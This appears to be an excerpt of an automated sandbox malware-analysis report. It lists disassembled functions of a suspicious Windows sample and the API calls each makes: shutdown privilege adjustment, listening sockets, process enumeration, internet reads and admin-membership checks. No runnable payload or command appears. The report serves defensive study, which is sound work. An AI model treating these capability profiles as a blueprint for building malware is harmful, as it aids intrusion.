                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                        • String ID: NULL Pointer assignment
                                                                        • API String ID: 1300414916-2785691316
                                                                        • Opcode ID: 75d9b2cc923ae93a0743f016cf15108b8754ef52f0d94989aaac1f1c81c0afbc
                                                                        • Instruction ID: b94fe02dc8c6efb3dbd016d263ea1a31c60a85fbbb86a5784e2a74f8f057a8ab
                                                                        • Opcode Fuzzy Hash: 75d9b2cc923ae93a0743f016cf15108b8754ef52f0d94989aaac1f1c81c0afbc
                                                                        • Instruction Fuzzy Hash: 69913971D00218ABDB14DF94DD81EEEBBB9EF08710F20915AF519B7281DB719A46CFA0
                                                                        Function 00EB79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00EAB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EAB180
                                                                          • Part of subcall function 00EAB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EAB1AD
                                                                          • Part of subcall function 00EAB134: GetLastError.KERNEL32 ref: 00EAB1BA
                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00EB7A0F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                        • String ID: $@$SeShutdownPrivilege
                                                                        • API String ID: 2234035333-194228
                                                                        • Opcode ID: 0b826539c724c99d106025d8e2961d7a43ac692593bcc3bbeded55e2cd6ac0e6
                                                                        • Instruction ID: 9b98f70382cfa6f2e6770eaa64d9b9bea534ae0c25d066b07efe80f34bf58f83
                                                                        • Opcode Fuzzy Hash: 0b826539c724c99d106025d8e2961d7a43ac692593bcc3bbeded55e2cd6ac0e6
                                                                        • Instruction Fuzzy Hash: 0901F77165C2116EF7681674DC4ABFF76589B85744F152824FDC3B64D2DA60AE00C1B0
                                                                        Function 00EC8C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00EC8CA8
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EC8CB7
                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00EC8CD3
                                                                        • listen.WSOCK32(00000000,00000005), ref: 00EC8CE2
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EC8CFC
                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00EC8D10
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                        • String ID:
                                                                        • API String ID: 1279440585-0
                                                                        • Opcode ID: 09bba2fa07b274e1410ed42e0cdd6ae84131abf4d288221a49c6f731f8d0930f
                                                                        • Instruction ID: 4cdc587752bb655ad31b01cb93d1a9f3cb4d41f997facb0be85c2b872561d5cc
                                                                        • Opcode Fuzzy Hash: 09bba2fa07b274e1410ed42e0cdd6ae84131abf4d288221a49c6f731f8d0930f
                                                                        • Instruction Fuzzy Hash: 3A2180316041009FC714AF68CE45F7EB7E9AF84314F149159F956BB2D2CB30AD46CB51
                                                                        Function 00EB6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00EB6554
                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00EB6564
                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00EB6583
                                                                        • __wsplitpath.LIBCMT ref: 00EB65A7
                                                                        • _wcscat.LIBCMT ref: 00EB65BA
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00EB65F9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                        • String ID:
                                                                        • API String ID: 1605983538-0
                                                                        • Opcode ID: a3f1e8affcc98b899c70570ea7bb27fa2264002861e751c3639e0e5f4269c71a
                                                                        • Instruction ID: 427cf126cb4c0c07dfd63381655be3f2623c8e4afc9a8f070ec4405477eea3c7
                                                                        • Opcode Fuzzy Hash: a3f1e8affcc98b899c70570ea7bb27fa2264002861e751c3639e0e5f4269c71a
                                                                        • Instruction Fuzzy Hash: 58218071901219AFDB20ABA4CC88BEEBBFCAB48304F5014E5E545F7141EB759F85CB60
                                                                        Function 00EC923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00ECA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00ECA84E
                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00EC9296
                                                                        • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00EC92B9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 4170576061-0
                                                                        • Opcode ID: acced4962f2e8f16fb3016716dedc571c2a3b1c42a1c4f45a3391ff9096b9ae1
                                                                        • Instruction ID: b235b0ceeccea6062ca91f53f54e5d9fd76738d6cd3775f1fc7b88fa7237a312
                                                                        • Opcode Fuzzy Hash: acced4962f2e8f16fb3016716dedc571c2a3b1c42a1c4f45a3391ff9096b9ae1
                                                                        • Instruction Fuzzy Hash: 2841CD70600204AFDB14BB688C86E7EB7EDEF44724F14944CF95ABB2D2DB749D028B91
                                                                        Function 00EBEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00EBEB8A
                                                                        • _wcscmp.LIBCMT ref: 00EBEBBA
                                                                        • _wcscmp.LIBCMT ref: 00EBEBCF
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00EBEBE0
                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00EBEC0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                        • String ID:
                                                                        • API String ID: 2387731787-0
                                                                        • Opcode ID: 797acd018d0fa06bf3642c1a727f31f8e56de0af13ac6273ca062eac4c094d1f
                                                                        • Instruction ID: 5a02b63131a36a441e662dfaa03de61740b097dfa00bb617f94cde01855ee758
                                                                        • Opcode Fuzzy Hash: 797acd018d0fa06bf3642c1a727f31f8e56de0af13ac6273ca062eac4c094d1f
                                                                        • Instruction Fuzzy Hash: 9041B1356047029FCB18DF28C491AEAB7E4FF49324F10455DE95AAB3A1DB31E944CF91
                                                                        Function 00ED8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                        • String ID:
                                                                        • API String ID: 292994002-0
                                                                        • Opcode ID: f841c53393e5267840af8fe5217820ebc340659e7caf01dc68e0135d6010325f
                                                                        • Instruction ID: 4a8740bac2acbfe9c7c8578a464a485c15b32c66f3f4e4c98bc9103755eed842
                                                                        • Opcode Fuzzy Hash: f841c53393e5267840af8fe5217820ebc340659e7caf01dc68e0135d6010325f
                                                                        • Instruction Fuzzy Hash: 5E119D31305211AFE7212F269D44A6FBBD9EF94764B05642AF949F7381CF30A90786A0
                                                                        Function 00E79B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                        • API String ID: 0-1546025612
                                                                        • Opcode ID: 009aa8439fe6cf5f7f14346d16714807ff1d6824b0dbc22e75de05f38c03741d
                                                                        • Instruction ID: dafcfcb048f0144e33e2dc9d61e798d32d96317fd00ad7a2b104a7e4e94dd4f3
                                                                        • Opcode Fuzzy Hash: 009aa8439fe6cf5f7f14346d16714807ff1d6824b0dbc22e75de05f38c03741d
                                                                        • Instruction Fuzzy Hash: E8928B71A0021ECBDF28CF58C9407FDB7B1AF94318F2495AAE91AB7281D7319D81DB91
                                                                        Function 00E8E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00E8E014,74DF0AE0,00E8DEF1,00F0DC38,?,?), ref: 00E8E02C
                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E8E03E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                        • API String ID: 2574300362-192647395
                                                                        • Opcode ID: dafdff0a0d3bcc51eeb37446b9aff5db792d5061e7ce0ee5eb23a1865e55bb05
                                                                        • Instruction ID: dddc4e67b16dae801ca60b347b61e4fe39f4704712b6312ac8b91f819b157d2d
                                                                        • Opcode Fuzzy Hash: dafdff0a0d3bcc51eeb37446b9aff5db792d5061e7ce0ee5eb23a1865e55bb05
                                                                        • Instruction Fuzzy Hash: 5ED0A730404B22AFC7315F61FD086227AD5AF0030CF194819E889F2250E7B4CC84D751
                                                                        Function 00EB13CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00EB13DC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: ($|
                                                                        • API String ID: 1659193697-1631851259
                                                                        • Opcode ID: 33c8a5bf0341624e0163808d8a106ed6ef1dd890bfd1f41ad2bf71d41f557913
                                                                        • Instruction ID: 2414bc43e19814f09e864deb3e88e6515b20689b08c3ce04c6feef5426ec966b
                                                                        • Opcode Fuzzy Hash: 33c8a5bf0341624e0163808d8a106ed6ef1dd890bfd1f41ad2bf71d41f557913
                                                                        • Instruction Fuzzy Hash: F6322775A007059FC728CF69C4909AAB7F0FF48324B51D5AEE4AAEB3A1D770E941CB44
                                                                        Function 00E8B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E8B22F
                                                                          • Part of subcall function 00E8B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00E8B5A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Proc$LongWindow
                                                                        • String ID:
                                                                        • API String ID: 2749884682-0
                                                                        • Opcode ID: 3e8f70be6dde3e8edd5116907ade7a09d2cc2e1a9472f83f715681e72d390579
                                                                        • Instruction ID: 394c94f44667981a99500d2f3c1fc9ddb4f81350549ff34c3334a1ebc3d16f4b
                                                                        • Opcode Fuzzy Hash: 3e8f70be6dde3e8edd5116907ade7a09d2cc2e1a9472f83f715681e72d390579
                                                                        • Instruction Fuzzy Hash: 19A14870114149FADB28BB2A5D89DBF299DEB45358F14711AF40EFA2B1CB159C01E372
                                                                        Function 00EC4EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00EC43BF,00000000), ref: 00EC4FA6
                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00EC4FD2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                        • String ID:
                                                                        • API String ID: 599397726-0
                                                                        • Opcode ID: c7303550e9d1c132757b64cd96934f2bdc1d515c3f6c76a1c06324f0730fbe45
                                                                        • Instruction ID: efe0fc11c8158eec3b71047d4226bdc4581c48b7e6b3d0645e05b379ee060554
                                                                        • Opcode Fuzzy Hash: c7303550e9d1c132757b64cd96934f2bdc1d515c3f6c76a1c06324f0730fbe45
                                                                        • Instruction Fuzzy Hash: 0341D8B2604609BFEB209E94DE81FBF77FDEB40758F10602EF605B6180D672AE42D650
                                                                        Function 00EBE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00EBE20D
                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00EBE267
                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00EBE2B4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                        • String ID:
                                                                        • API String ID: 1682464887-0
                                                                        • Opcode ID: 6346ec5da73fd41a4fa525989d360525a05886de165af9f5f7e2908ebbffbc3e
                                                                        • Instruction ID: ec5fa52542d479be79b5600a4f0635f695d476b6bf7b02d303d489f3a7329729
                                                                        • Opcode Fuzzy Hash: 6346ec5da73fd41a4fa525989d360525a05886de165af9f5f7e2908ebbffbc3e
                                                                        • Instruction Fuzzy Hash: 72213C35A00118EFCB00EFA5D885AEEFBF9FF89314F1484A9E949A7361DB319915CB50
                                                                        Function 00EAB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8F4EA: std::exception::exception.LIBCMT ref: 00E8F51E
                                                                          • Part of subcall function 00E8F4EA: __CxxThrowException@8.LIBCMT ref: 00E8F533
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EAB180
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EAB1AD
                                                                        • GetLastError.KERNEL32 ref: 00EAB1BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 1922334811-0
                                                                        • Opcode ID: 815a66f177899a812247c82aa119afaabc90ca3717c208784dcdd5506ff85db4
                                                                        • Instruction ID: 86c9c767e86bf7f54820e5cc8291584b0660e4bb61883769fb9b702c3393f48b
                                                                        • Opcode Fuzzy Hash: 815a66f177899a812247c82aa119afaabc90ca3717c208784dcdd5506ff85db4
                                                                        • Instruction Fuzzy Hash: F211BCB2504204AFE718AF64DC86D2BBBEDEB49310B20852EE05AA7241DB70FC41CB60
                                                                        Function 00EB6685 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00EB66AF
                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00EB66EC
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00EB66F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                        • String ID:
                                                                        • API String ID: 33631002-0
                                                                        • Opcode ID: 504dead4102a6f6a71204ea9683bfabd5357bcc532e15182f81ce5e702dc7710
                                                                        • Instruction ID: 5b2d2f6897ec7304d80bdb51b3a30b40f0d99c672794028fa440ea602c124c65
                                                                        • Opcode Fuzzy Hash: 504dead4102a6f6a71204ea9683bfabd5357bcc532e15182f81ce5e702dc7710
                                                                        • Instruction Fuzzy Hash: 811182B1901229BFE7109BA8DC45FEF7BACEB08718F004556F901F7190C2789E0487A1
                                                                        Function 00EB71FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00EB7223
                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00EB723A
                                                                        • FreeSid.ADVAPI32(?), ref: 00EB724A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
